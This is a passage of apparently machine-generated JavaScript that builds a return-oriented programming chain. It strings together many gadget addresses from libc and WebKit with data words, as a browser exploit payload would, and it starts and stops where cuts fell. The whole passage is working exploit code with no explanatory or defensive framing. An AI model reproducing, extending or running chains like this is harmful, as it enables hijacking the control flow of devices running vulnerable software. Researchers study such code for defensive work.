libc_base+763368 //pop rcx
]);
//L11545:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11546:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11547:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11548:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+526000, //L11549+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+525992, //L11549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11549:
db([0, 0]); // 0x0
set_gadgets([
ropchain+526016, //L11549+24
ropchain+530040, //L11544
//L11550:
libc_base+764760, //pop rsi
ropchain+526056, //L11551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11551:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11553:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+526176, //L11556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+526160, //L11554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11554:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11556:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+526352, //L11559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+526368, //L11560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+526320, //L11557
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+526336, //L11558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11557:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11558:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11559:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11560:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+526464, //L11562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+526448, //L11561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11561:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11562:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+526552, //L11564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11563:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11564:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+526608, //L11565
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11565:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11567:
db([4294967204, 4294967295]); // -0x5c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+526688, //L11569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11569:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+526824, //L11572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+526808, //L11571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11570:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11571:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11572:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+526928, //L11574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+526912, //L11573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11573:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11574:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+527008, //L11575
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11575:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11577:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+527128, //L11580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+527112, //L11578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11578:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11580:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+527304, //L11583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+527320, //L11584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+527272, //L11581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+527288, //L11582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11581:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11582:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11583:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11584:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+527480, //L11588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+527448, //L11586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+527464, //L11587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11585:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11586:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11587:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11588:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+527568, //L11589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+527584, //L11590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11589:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11590:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+527760, //L11592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+527776, //L11593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+527744, //L11591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11591:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11592:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11593:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+527888, //L11595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+527936, //L11598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+527904, //L11596
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11595:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11596:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11597:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11598:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+528048, //L11599+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+528040, //L11599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11599:
db([0, 0]); // 0x0
set_gadgets([
ropchain+528064, //L11599+24
ropchain+530008, //L11594
libc_base+764760, //pop rsi
ropchain+528104, //L11600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11600:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11602:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+528224, //L11605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+528208, //L11603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11603:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11605:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+528368, //L11608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+528336, //L11606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+528352, //L11607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11606:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11607:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11608:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+528448, //L11609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11609:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11611:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+528568, //L11614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+528552, //L11612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11612:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11614:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+528712, //L11617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+528680, //L11615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+528696, //L11616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11615:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11616:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11617:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+528800, //L11619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11618:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11619:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+528856, //L11620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11620:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11622:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+528936, //L11624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11624:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+529048, //L11625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11625:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11627:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+529168, //L11630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+529152, //L11628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11628:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11630:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+529312, //L11633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+529280, //L11631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+529296, //L11632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11631:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11632:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11633:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+529392, //L11634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11634:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11635:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L11636:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+529520, //L11638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+529504, //L11637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11637:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11638:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+529600, //L11639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11639:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11641:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+529720, //L11644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+529704, //L11642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11644:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+529800, //L11646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+529832, //L11648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11646:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L11647:
ropchain+529960, //L11645
libc_base+144605 //pop rdi
]);
//L11648:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+529936, //L11650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+529952, //L11649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L11650:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L11649:
db([0, 0]); // 0x0
//L11645:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+530024, //L11651
//L11594:
libc_base+782311, //pop rsp
ropchain+530040, //L11652
//L11651:
libc_base+782311, //pop rsp
ropchain+526016, //L11550
//L11652:
//L11544:
libc_base+764760, //pop rsi
ropchain+530080, //L11653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11653:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11655:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+530200, //L11658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+530184, //L11656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11656:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11658:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+530344, //L11661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+530312, //L11659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+530328, //L11660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11659:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11660:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11661:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+530432, //L11663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11662:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11663:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+530488, //L11664
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11664:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11666:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+530568, //L11668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11668:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+548864, //L10599
//L8546:
libc_base+759608 //pop rax
]);
//L11669:
db([8, 0]); // 0x8
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+530728, //L11671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11670:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11671:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11672:
db([2, 0]); // 0x2
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+530832, //L11673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+530848, //L11674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11673:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11674:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+530992, //L11677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+530976, //L11676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11675:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11676:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11677:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+531056, //L11678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11678:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11680:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L11682:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+531216, //L11685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+531200, //L11683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11683:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11685:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+531392, //L11688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+531408, //L11689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+531360, //L11686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+531376, //L11687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11686:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11687:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11688:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11689:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+531504, //L11691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+531488, //L11690
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11690:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11691:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11692:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11693:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L11694:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11695:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11696:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L11697:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
